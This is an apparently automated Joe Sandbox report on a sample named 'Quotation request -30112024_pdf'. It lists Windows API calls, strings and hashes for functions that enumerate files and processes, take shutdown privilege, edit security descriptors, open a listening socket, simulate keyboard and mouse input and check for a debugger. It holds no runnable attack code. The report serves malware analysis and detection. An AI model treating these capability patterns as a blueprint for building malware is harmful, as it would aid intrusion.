                                                                    • _, xrefs: 0040371C
                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                    • Unterminated string, xrefs: 00428348
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                    • API String ID: 3393021363-188983378
                                                                    • Opcode ID: a50e8edb89c9c00785e667ee16a164b4e0d2503652e3acd12a07c488f9d64942
                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                    • Opcode Fuzzy Hash: a50e8edb89c9c00785e667ee16a164b4e0d2503652e3acd12a07c488f9d64942
                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2192556992-3457252023
                                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                    • __swprintf.LIBCMT ref: 004722B9
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FolderPath$LocalTime__swprintf
                                                                    • String ID: %.3d
                                                                    • API String ID: 3337348382-986655627
                                                                    • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                    • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                    • GetLastError.KERNEL32 ref: 00433414
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 2938487562-3733053543
                                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                    APIs
                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                    Similarity
                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 1255039815-0
                                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 00433073
                                                                    • __swprintf.LIBCMT ref: 00433085
                                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                    • String ID:
                                                                    • API String ID: 1158019794-0
                                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _memmove$_strncmp
                                                                    • String ID: @oH$\$^$h
                                                                    • API String ID: 2175499884-3701065813
                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                    • API String ID: 0-2872873767
                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2547909840-0
                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                    • String ID: *.*$\VH
                                                                    • API String ID: 2786137511-2657498754
                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID: pqI
                                                                    • API String ID: 2579439406-2459173057
                                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                    APIs
                                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicollmouse_event
                                                                    • String ID: DOWN
                                                                    • API String ID: 1033544147-711622031
                                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
